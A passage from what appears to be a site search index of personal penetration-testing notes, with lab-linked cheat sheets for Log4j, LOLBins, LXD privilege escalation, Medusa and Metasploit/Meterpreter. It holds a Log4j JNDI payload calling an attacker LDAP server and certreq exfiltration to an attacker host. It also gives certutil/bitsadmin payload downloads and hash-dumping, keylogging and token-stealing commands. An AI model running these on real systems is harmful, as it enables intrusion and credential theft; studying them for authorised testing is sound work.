                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

                        Once we send that request, our jndi server will resend the reverse shell:

                        And in our terminal with the nc listener we will get the reverse shell.

                        The misinterpretation of attacker-controlled input (often the User-Agent header; here, the remember parameter) leads to a JNDI lookup, which is executed as a command by the system with administrator privileges and queries a remote server controlled by the attacker, which in our case is the Destination in our concept of attacks. This query requests a Java class created by the attacker and manipulated for their own purposes. The queried Java code inside the manipulated Java class gets executed in the same process, leading to a remote code execution (RCE) vulnerability. GovCERT.ch has created an excellent graphical representation of the Log4j vulnerability worth examining in detail. Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#related-labs","title":"Related labs","text":"

                        Walkthrough HackTheBox machine: Unified.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"lolbins-lolbas-gtfobins/","title":"LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins","text":"

                        The term LOLBins (Living off the Land binaries) came from a Twitter discussion on what to call binaries that an attacker can use to perform actions beyond their original purpose. There are currently two websites that aggregate information on Living off the Land binaries:

                        • LOLBAS Project for Windows Binaries
                        • GTFOBins for Linux Binaries
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#windows-lolbas","title":"Windows - LOLBAS","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#certreqexe","title":"CertReq.exe","text":"

                        Let's use CertReq.exe as an example.

                        # From the victim's machine we can send, for instance, file.txt to our kali machine\ncertreq.exe -Post -config http://$ipKali c:\\folder\\file.txt\n\n# On the kali (attacking) machine, we use a netcat listener\nsudo nc -lvnp 80\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#linux-gtfobins","title":"Linux - GTFOBins","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#openssl","title":"OpenSSL","text":"
                        # Create Certificate in our attacker machine\nopenssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n\n# Stand up the Server in our attacker machine\nopenssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh\n\n# Download File to the victim's Machine, but run command from the attacker kali\nopenssl s_client -connect $ipVictim:80 -quiet > LinEnum.sh\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#other-common-living-off-the-land-tools","title":"Other Common Living off the Land tools","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#bitsadmin-download-function","title":"Bitsadmin Download function","text":"

                        The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It \"intelligently\" takes host and network utilization into account to minimize the impact on a user's foreground work.

                        # File Download with Bitsadmin\nbitsadmin /transfer wcb /priority foreground http://$ip:8000/nc.exe C:\\Users\\htb-student\\Desktop\\nc.exe\n

                        PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.

                        # Download\nImport-Module bitstransfer; Start-BitsTransfer -Source \"http://$ip/nc.exe\" -Destination \"C:\\Temp\\nc.exe\"\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#download-a-file-with-certutil","title":"Download a File with Certutil","text":"

                        Certutil can be used to download arbitrary files.

                        certutil.exe -verifyctl -split -f http://$ip/nc.exe\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lxd/","title":"lxd","text":"

                        LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.

                        A member of the local \u201clxd\u201d group can instantly escalate privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights, and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

                        Source: https://www.hackingarticles.in/lxd-privilege-escalation/. In this article, you can find a good explanation about how lxc works. Original source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071.

                        ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#privileges-escalation","title":"Privileges escalation","text":"

                        Privilege escalation through lxd requires access to a local account that belongs to the lxd group.

                        In order to escalate to root on the host machine, you have to create an image for lxd, performing the following actions:

                        Steps to be performed on the attacker machine:

                        # Download build-alpine to your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \u201cbuild-alpine\u201d to build the latest Alpine image as a compressed file. This step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy the file to your /var/www/html folder and start the apache2 service.\n

                        Steps to be performed on the victim machine:

                        # Download the alpine image. Go, for instance, to the /tmp folder and, if you have started the apache2 service on the attacker machine, do a wget:\nwget http://AttackerIP/alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the host filesystem inside the container under /mnt/root\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Start the container\nlxc start ignite\n\n# Launch a shell inside the container\nlxc exec ignite /bin/sh\n
                        ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#related-labs","title":"Related labs","text":"

                        HackTheBox machine Included.

                        ","tags":["privilege escalation","linux","lxd"]},{"location":"m365-cli/","title":"M365 CLI","text":"","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#installation","title":"Installation","text":"

                        Source: https://pnp.github.io/cli-microsoft365/cmd/docs/

                        Install m365 cli from: https://github.com/pnp/cli-microsoft365

                        Login into Microsoft:

                        m365 login  \n

                        You will be prompted to open a browser at https://microsoft.com/devicelogin. Enter the code indicated by the prompt and log in as an M365 user.

                        ","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#ennumeration-techniques","title":"Ennumeration techniques","text":"

                        Get information about the default Power Apps environment.

                        m365 pa environment get  \n

                        List Microsoft Power Apps environments in the current tenant

                        m365 pa environment list \n

                        List all available apps for that user

                        m365 pa app list  \n

                        List all apps in an environment as Admin

                        m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Remove an app

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

                        Removes the specified Power App without confirmation

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

                        Removes the specified Power App you don't own

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default- 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Add an owner without removing the old one

                        m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

                        Export an app

                        m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
                        ","tags":["Microsoft 365","pentesting"]},{"location":"machines/","title":"Machines and lab resources","text":"machine OWASP Juice Shop Is a modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire\u00a0OWASP Top Ten\u00a0along with many other real-world application security flaws. Metasploitable 2 Is a purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation. Metasploitable 3 Is a template for building a vulnerable Windows VM configured with a wide range of\u00a0vulnerabilities. DVWA This is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty. VAPI vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises. https://overthewire.org/wargames/ The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Linux https://underthewire.tech/wargames The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Windows

                        Each Pro Lab has a specific scenario and level of difficulty:

                        | Lab | Scenario |
                        | --- | --- |
                        | Dante | Beginner-friendly lab to learn common pentesting techniques and methodologies, common pentesting tools, and common vulnerabilities. |
                        | Offshore | Active Directory lab that simulates a real-world corporate network. |
                        | Cybernetics | Simulates a fully-upgraded and up-to-date Active Directory network environment, which is hardened against attacks. It is aimed at experienced penetration testers and Red Teamers. |
                        | RastaLabs | Red Team simulation environment, featuring a combination of attacking misconfigurations and simulated users. |
                        | APTLabs | Simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider) and is the most advanced Pro Lab offered at this time. |
                        "},{"location":"mariadb/","title":"MariaDB","text":"

                        MariaDB is an open-source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by the MariaDB Foundation and was initially released on 29 October 2009. MariaDB offers a significant number of new features, which make it better in terms of performance and user-orientation than MySQL.

                        ","tags":["database","relational database","SQL"]},{"location":"mariadb/#basic-commands","title":"Basic commands","text":"
                        # Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n
                        ","tags":["database","relational database","SQL"]},{"location":"mariadb/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
                        # -h host/ip   \n# -u user As default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
                        ","tags":["database","relational database","SQL"]},{"location":"markdown/","title":"Markdown","text":"","tags":["tool","language"]},{"location":"markdown/#titles-code","title":"Titles: code","text":"
                        # H1\n
                        ## H2\n
                        ### H3\n
                        ","tags":["tool","language"]},{"location":"markdown/#formating-the-text","title":"Formating the text","text":"
                        *italic*   \n
                        **bold**\n
                        ==highlight==\n
                        ","tags":["tool","language"]},{"location":"markdown/#blockquote-code","title":"Blockquote code","text":"
                        > blockquote\n
                        ","tags":["tool","language"]},{"location":"markdown/#lists","title":"Lists","text":"

                        Bullets

                        + One bullet\n+ Second Bullet\n+ Third bullet\n

                        Ordered lists

                        1. First item in list\n2. Second item in list\n

                        Item list

                        - First item\n- Second item\n- Third item\n
                        ","tags":["tool","language"]},{"location":"markdown/#horizontal-rule","title":"Horizontal rule","text":"
                        --- \n
                        ","tags":["tool","language"]},{"location":"markdown/#links","title":"Links","text":"
                        [link](https://www.example.com)\n
                        ","tags":["tool","language"]},{"location":"markdown/#image-code","title":"Image: code","text":"
                        ![alt text](image.jpg)\n
                        ","tags":["tool","language"]},{"location":"markdown/#tables","title":"Tables","text":"
                        | ColumnName | ColumnName |\n| ---------- | ---------- |\n| Content | Content that you want |\n
                        ","tags":["tool","language"]},{"location":"markdown/#footnote-code","title":"Footnote: code","text":"
                        Here's a sentence with a footnote. [^1]\n\n[^1]: This is the footnote. \n
                        ","tags":["tool","language"]},{"location":"markdown/#task-list","title":"Task list","text":"
                        - [x] Write the press release\n- [ ] Update the website\n- [ ] Contact the media \n
                        ","tags":["tool","language"]},{"location":"markdown/#fenced-coded-block-code","title":"Fenced coded block: code","text":"
                        \\```\ncode inside\n\\```\n
                        ","tags":["tool","language"]},{"location":"markdown/#strikethrough","title":"Strikethrough","text":"
                        ~~Love is flat.~~ \n
                        ","tags":["tool","language"]},{"location":"markdown/#emojis","title":"Emojis","text":"
                        :emoji-code: \n
                        ","tags":["tool","language"]},{"location":"masscan/","title":"masscan - An IP scanner","text":"

                        Masscan was designed to deal with large networks and to scan thousands of IP addresses at once. It\u2019s faster than nmap but probably less accurate.

                        ","tags":["reconnaissance","scanning"]},{"location":"masscan/#installation","title":"Installation","text":"
                        sudo apt-get install git gcc make libpcap-dev\ngit clone https://github.com/robertdavidgraham/masscan\ncd masscan/\nmake\n

                        \"make\" puts the program in the masscan/bin subdirectory. To install it (on Linux) run:

                        make install\n

                        The source consists of a lot of small files, so building goes a lot faster using the multi-threaded build. This requires more than 2 GB of memory on a Raspberry Pi (and breaks), so you might use a smaller number, like -j4, rather than all possible threads.

                        make -j\n

                        Make sure that it is running properly:

                        cd bin\n./masscan --regress\n
                        ","tags":["reconnaissance","scanning"]},{"location":"masscan/#usage","title":"Usage","text":"

                        Usage is similar to nmap. To scan a network segment for some ports:

                        ./masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 10.0.2.1/24 -e eth0 --router-ip 10.0.2.2 --echo > masscan.conf\n# To see the complete list of options, use the --echo feature. This dumps the current configuration and exits. The output can be used as input back into the program.\n

                        Another example:

                        masscan -p80,8000-8100 10.0.0.0/8 2603:3001:2d00:da00::/112\n# This will scan the `10.x.x.x` subnet, and `2603:3001:2d00:da00::x` subnets\n# Scan port 80 and the range 8000 to 8100, or 102 ports total, on both subnets\n# Print output to `<stdout>` that can be redirected to a file\n
                        ","tags":["reconnaissance","scanning"]},{"location":"masscan/#editing-config-file","title":"Editing config file","text":"
                        nano masscan.conf\n# here, you add:  output-filename = scan.list //also json, xml\n
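
                        A minimal sketch of what the resulting config file might contain (values are illustrative):

                        rate = 800.00\nports = 22,80,443,53,3389,8080,445\nrange = 10.0.2.1/24\noutput-filename = scan.list\n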

                        Now, to run it again using the configuration file:

                        masscan -c masscan.conf\n
                        ","tags":["reconnaissance","scanning"]},{"location":"medusa/","title":"Medusa","text":"

                        Medusa is a speedy, parallel, and modular login brute-forcer. The goal is to support as many services that allow remote authentication as possible. The author considers thread-based parallel testing, flexible user input, and its modular design to be some of the key features of this application.

                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#installation","title":"Installation","text":"

                        Pre-installed in Kali.

                        wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz\ntar -xzf medusa-2.2.tar.gz\ncd medusa-2.2\n./configure\nmake\nmake install\n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#basic-usage","title":"Basic usage","text":"
                        # Brute force FTP logging\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n# -n: for a different non-default port. For instance, port 2121 for ftp \n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"metasploit/","title":"metasploit","text":"

                        Developed in Ruby by Rapid7. The \"free\" edition comes preinstalled in Kali at /usr/share/metasploit-framework.

                        ","tags":["pentesting"]},{"location":"metasploit/#run-metasploit","title":"Run metasploit","text":"
                        # Start the postgresql service\nservice postgresql start \n\n# Initiate the database\nsudo msfdb init\n\n# Launch metasploit from the terminal. -q means without banner\nmsfconsole -q\n
                        ","tags":["pentesting"]},{"location":"metasploit/#update-metasploit","title":"Update metasploit","text":"

                        How to update the metasploit database, since msfupdate is deprecated:

                        # Update the whole system\napt update && apt upgrade -y\n\n# Update libraries and dependencies\napt dist-upgrade\n\n# Reinstall the app\napt install metasploit-framework\n
                        ","tags":["pentesting"]},{"location":"metasploit/#basic-commands","title":"Basic commands","text":"
                        # Help information\nshow -h\u00a0 \n
                        =========================\n\nDatabase Backend Commands\n\n=========================\n\ndb_connect        Connect to an existing data service\n\ndb_disconnect     Disconnect from the current data service\n\ndb_export         Export a file containing the contents of the database\nBefore closing the session, save a backup:\ndb_export -f xml backup.xml\n\ndb_import         Import a scan result file (filetype will be auto-detected)\nFor instance: \ndb_import Target.xml\ndb_import Target.nmap\n\ndb_nmap           Executes nmap and records the output automatically\n\nAfter that, we can query: \nhosts\n# The hosts command displays a database table automatically populated with the host addresses, hostnames, and other information we find about these during our scans and interactions. \n# hosts -h # to see all commands with hosts \n\nservices\n# It contains a table with descriptions and information on services discovered during scans or interactions.\n# services -h # to see all commands with services \n\ncreds\n# The creds command allows you to visualize the credentials gathered during your interactions with the target host.\n# creds -h # to see all commands with creds \n\nloot\n# The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.\n# loot -h # to see all commands with loot \n\ndb_rebuild_cache  Rebuilds the database-stored module cache (deprecated)\n\ndb_remove         Remove the saved data service entry\n\ndb_save           Save the current data service connection as the default to reconnect on startup\n\ndb_status         Show the current data service status\n\nhosts             List all hosts in the database\n\nloot              List all loot in the database\n\nnotes             List all notes in the database\n\nservices          List all services in the database\n\nvulns             List all vulnerabilities in the database\n\nworkspace         Switch between database workspaces\nworkspace         List workspaces\nworkspace -v      List workspaces verbosely\nworkspace [name]  Switch workspace\nworkspace -a [name] ...    Add workspace(s)\nworkspace -d [name] ...    Delete workspace(s)\nworkspace -D     Delete all workspaces\nworkspace -r     Rename workspace\nworkspace -h     Show this help information\n

                        Cheat sheet:

                        # Search modules\nsearch <searchterm> \ngrep meterpreter show payloads\ngrep -c meterpreter grep reverse_tcp show payloads\n\n# Search for an exploit for the service hfs 2.3 with searchsploit\nsearchsploit hfs 2.3\n\n# Launch msfconsole and run the reload_all command for a newly installed module to appear in the list\nreload_all\n\n\n# Use a module\nuse <name of module (like exploit/cmd/linux/tcp_reverse) or number> \n\n# Show options of the current module (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> show options\n\n# Configure an option (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> set <option> <value> \n\n# Configure an option as a constant during the msf session (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> setg <option> <value> \n\n# Go back to the main msf prompt (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> back \n\n# View related information of the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> info \n\n# View related payloads of the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> show payloads \n\n# Set a payload for the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> set payload <value> \n\n# Before we run an exploit-script, we can run a check to ensure the server is vulnerable (note that not every exploit in the Metasploit Framework supports the `check` function)\nmsf6 exploit(windows/smb/ms17_010_psexec) > check\n\n# Run the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> run \n\n# Run the exploit, alternative command (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> exploit \n\n# Run an exploit as a job by typing exploit -j\nexploit -j\n\n# See all sessions (Watch out, prompt is included)\nmsf> sessions\n\n# Switch to session number n (Watch out, prompt is included)\nmsf> sessions -i <n> \n\n# Kill all sessions (Watch out, prompt is included)\nmsf> sessions -K \n

                        To kill a session we don't use CTRL-C, because the port would still be in use. For that, we use jobs:

                        +++++++++\njobs\n++++++++++\n    -K        Terminate all running jobs.\n    -P        Persist all running jobs on restart.\n    -S <opt>  Row search filter.\n    -h        Help banner.\n    -i <opt>  Lists detailed information about a running job.\n    -k <opt>  Terminate jobs by job ID and/or range.\n    -l        List all running jobs.\n    -p <opt>  Add persistence to job by job ID\n    -v        Print more detailed info.  Use with -i and -l\n
                        ","tags":["pentesting"]},{"location":"metasploit/#databases","title":"Databases","text":"
                        # Start PostgreSQL\nsudo systemctl start postgresql\n\n# Initiate a Database\nsudo msfdb init\n\n# Check status\nsudo msfdb status\n\n# Connect to the Initiated Database\nsudo msfdb run\n\n# Reinitiate the Database\nmsfdb reinit\ncp /usr/share/metasploit-framework/config/database.yml ~/.msf4/\nsudo service postgresql restart\nmsfconsole -q\nmsf6 > db_status\n
                        ","tags":["pentesting"]},{"location":"metasploit/#plugins","title":"Plugins","text":"

                        To start using a plugin, we will need to ensure it is installed in the correct directory on our machine.

                        ls /usr/share/metasploit-framework/plugins\n

                        If the plugin is found here, we can fire it up inside msfconsole. Example:

                        load nessus\n

                        To install new custom plugins not included in updates of the distro, we can take the .rb file provided on the maker's page and place it in /usr/share/metasploit-framework/plugins with the proper permissions. Many people write different plugins for the Metasploit framework:

                        nMap (pre-installed), NexPose (pre-installed), Nessus (pre-installed), Mimikatz (pre-installed, v1), Stdapi (pre-installed), Railgun, Priv, Incognito (pre-installed), Darkoperator's

                        ","tags":["pentesting"]},{"location":"metasploit/#meterpreter","title":"Meterpreter","text":"

                        The Meterpreter payload is a specific type of multi-faceted payload that uses DLL injection to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.

                        When having an active session on the victim machine, a good module for making the Meterpreter session persistent is s4u_persistence:

                        use exploit/windows/local/s4u_persistence\n\nshow options\n\nsessions\u00a0\n
                        ","tags":["pentesting"]},{"location":"metasploit/#meterpreter-commands","title":"meterpreter commands","text":"
                        # View all available commands\nhelp \n\n# Obtain a shell. Type exit to leave the shell\nshell \n\n# View information about the system\nsysinfo\n\n# View the id that meterpreter assigns to the machine\nmachine_id\n\n# Print the network configuration\nifconfig \n\n# Check routing information\nroute \n\n# Download a file\ndownload /path/to/fileofinterest.txt /path/to/ourmachine/destinationfile.txt\n\n# Upload a file\nupload /path/from/source.txt /path/to/destinationfile.txt\n\n# Bypass the authentication. It takes you from normal user to admin\ngetsystem\n# If the operation fails because of a priv_elevated_getsystem error message, then use the bypassuac module: use exploit/windows/local/bypassuac\n\n# View who you are\ngetuid  \n\n# View all running processes\nps\n\n# Steal the token of a process with more privileges\nsteal_token <PID>\n\n# View the process that we are\ngetpid\n\n# Dump the contents of the SAM database\nhashdump      \n\n# Dump the SAM database (kiwi extension)\nlsa_dump_sam\n\n# Meterpreter LSA Secrets Dump\nlsa_dump_secrets\n\n# Enumerate the modules available in this meterpreter session\nuse -l \n\n# Load a specific module\nuse <name of module> \n\n# View all processes run by SYSTEM. This allows us to choose one to migrate our persistent connection into, in order to look less suspicious.\nps -U SYSTEM \n\n# Migrate to a process\nmigrate <pid> \nmigrate -N lsass.exe\n# -N   Look for the lsass.exe process and migrate into it. We can do this to run the command hashdump (we\u2019ll get hashes to use with john the ripper or ophcrack). Also, we can choose a less suspicious process such as svchost.exe and migrate there.\n\n# Get a windows shell\nexecute -f cmd.exe -i -H\n\n# Display the host ARP cache\narp           \n\n# Display the current proxy configuration\ngetproxy\n\n# Display interfaces\nifconfig       \n\n# Display the network connections\nnetstat       \n\n# Forward a local port to a remote service\nportfwd       \n\n# Resolve a set of hostnames on the target\nresolve       \n

                        More commands

                        msf6> help\n    Command        Description\n    -------        -----------\n    enumdesktops   List all accessible desktops and window stations\n    getdesktop     Get the current meterpreter desktop\n    idletime       Returns the number of seconds the remote user has been idle\n    keyboard_send  Send keystrokes\n    keyevent       Send key events\n    keyscan_dump   Dump the keystroke buffer\n    keyscan_start  Start capturing keystrokes\n    keyscan_stop   Stop capturing keystrokes\n    mouse          Send mouse events\n    screenshare    Watch the remote user's desktop in real-time\n    screenshot     Grab a screenshot of the interactive desktop\n    setdesktop     Change the meterpreter's current desktop\n    uictl          Control some of the user interface components\n
                        ","tags":["pentesting"]},{"location":"metasploit/#metasploit-modules","title":"metasploit modules","text":"

                        Modules are located at /usr/share/metasploit-framework/modules and have the following structure:

                        <No.> <type>/<os>/<service>/<name>\n794   exploit/windows/ftp/scriptftp_list\n

                        If we do not want to use our web browser to search for a specific exploit within ExploitDB, we can use the CLI version, searchsploit.

                        searchsploit nagios3\n

                        How to download and install an exploit from exploitdb:

                        # Search for the exploit on the website or using searchsploit and download it. It should have a .rb extension\nsearchsploit nagios3\n\n# The default directory where all the modules, scripts, plugins, and msfconsole proprietary files are stored is /usr/share/metasploit-framework. The critical folders are also symlinked in our home and root folders in the hidden ~/.msf4/ location.\n# Make sure that the ~/.msf4 location mirrors the folder structure of /usr/share/metasploit-framework. If not, mkdir the appropriate folders so that the structure matches the original and msfconsole can find the new modules.\n\n# After that, copy the .rb script directly into the primary location.\n
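
                        A minimal sketch of the whole process (the module subfolder and file name here are hypothetical):

                        mkdir -p ~/.msf4/modules/exploits/unix/webapp\ncp exploit_name.rb ~/.msf4/modules/exploits/unix/webapp/\nmsfconsole -q -x \"reload_all\"\n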
                        ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryscannersmbsmb_login","title":"auxiliary/scanner/smb/smb_login","text":"

                        Use this module to enumerate users and brute-force passwords against an SMB service.
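
                        A minimal usage sketch (the wordlist paths are placeholders):

                        use auxiliary/scanner/smb/smb_login\nset RHOSTS $ip\nset USER_FILE users.txt\nset PASS_FILE passwords.txt\nrun\n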

                        ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryhttp_javascript_keylogger","title":"auxiliary/http_javascript_keylogger","text":"

                        It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.

                        ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherhasdump","title":"post/windows/gather/hasdump","text":"

                        Once you have a meterpreter session as the SYSTEM user, this module dumps all local password hashes.
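
                        A minimal usage sketch (the session ID is an assumption):

                        use post/windows/gather/hashdump\nset SESSION 1\nrun\n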

                        ","tags":["pentesting"]},{"location":"metasploit/#windowsgatherarp-scanner","title":"windows/gather/arp-scanner","text":"

                        To enumerate live IPs on a network segment reachable from the compromised host, using ARP requests.
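
                        A minimal usage sketch (session ID and target range are assumptions):

                        use post/windows/gather/arp_scanner\nset SESSION 1\nset RHOSTS 10.10.10.0/24\nrun\n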

                        ","tags":["pentesting"]},{"location":"metasploit/#windowsgathercredentialswindows_autologin","title":"windows/gather/credentials/windows_autologin","text":"

                        This module extracts the plain-text Windows user login password from the Registry. It exploits a Windows feature (2000 to 2008 R2) that allows a user or third-party Windows utility tools to configure user AutoLogin via plain-text password insertion in the (Alt)DefaultPassword field at the registry location HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon. This is readable by all users.
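
                        To illustrate, the same values can also be read manually with reg.exe from a shell on the host (a sketch using the path described above):

                        reg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultPassword\n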

                        ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherwin_privs","title":"post/windows/gather/win_privs","text":"

                        This module tells you the privileges you have on the exploited machine.

                        ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowslocalbypassuac","title":"exploit/windows/local/bypassuac","text":"

                        If the getsystem command fails in the meterpreter because of a priv_elevated_getsystem error message, use this module to bypass that restriction. You will get a new meterpreter session with the UAC policy disabled, and from there you can run getsystem.
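
                        A minimal usage sketch (session ID and listener address are assumptions):

                        use exploit/windows/local/bypassuac\nset SESSION 1\nset LHOST $ip\nrun\n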

                        ","tags":["pentesting"]},{"location":"metasploit/#postmultimanageshell_to_meterpretersessions","title":"post/multi/manage/shell_to_meterpretersessions","text":"

                        It upgrades a basic shell session to a Meterpreter session.
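
                        A minimal usage sketch (the session ID is an assumption); sessions -u does the same from the msf prompt:

                        use post/multi/manage/shell_to_meterpreter\nset SESSION 1\nrun\n\n# shortcut\nsessions -u 1\n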

                        ","tags":["pentesting"]},{"location":"metasploit/#postmultireconlocal_exploit_suggester","title":"post/multi/recon/local_exploit_suggester","text":"

                        The local exploit suggester module checks an existing session for local privilege escalation exploits that are likely to work:

                        post/multi/recon/local_exploit_suggester\n
                        ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryserversocks_proxy","title":"auxiliary/server/socks_proxy","text":"

                        This module provides a SOCKS proxy server that uses the built-in Metasploit routing to relay connections.
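
                        A minimal usage sketch (listening address, port, and SOCKS version are assumptions):

                        use auxiliary/server/socks_proxy\nset SRVHOST 127.0.0.1\nset SRVPORT 1080\nset VERSION 5\nrun -j\n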

                        ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowsfileformatadobe_pdf_embedded_exe","title":"exploit/windows/fileformat/adobe_pdf_embedded_exe","text":"

                        This module (and its variant, exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs) embeds malware into an Adobe PDF.
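
                        A minimal usage sketch (the file names are placeholders):

                        use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset INFILENAME template.pdf\nset FILENAME report.pdf\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST $ip\nrun\n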

                        ","tags":["pentesting"]},{"location":"metasploit/#integration-of-metasploit-with-veil","title":"Integration of metasploit with veil","text":"

                        One nice thing about Veil is that it provides a Metasploit RC file, meaning that in order to launch the multi/handler you just need to run:

                        msfconsole -r path/to/metasploitRCfile\n
                        ","tags":["pentesting"]},{"location":"metasploit/#ipmi-information-discovery","title":"IPMI Information discovery","text":"

                        See the IPMI service on UDP/623. This module discovers host information through IPMI Channel Auth probes:

                        use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions\nset ACTION <action-name>\nshow options\n# set needed options\nrun\n
                        ","tags":["pentesting"]},{"location":"metasploit/#pmi-20-rakp-remote-sha1-password-hash-retrieval","title":"PMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

                        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory, as well as with hashcat (CPU) 0.46 or newer using hash type 7300.

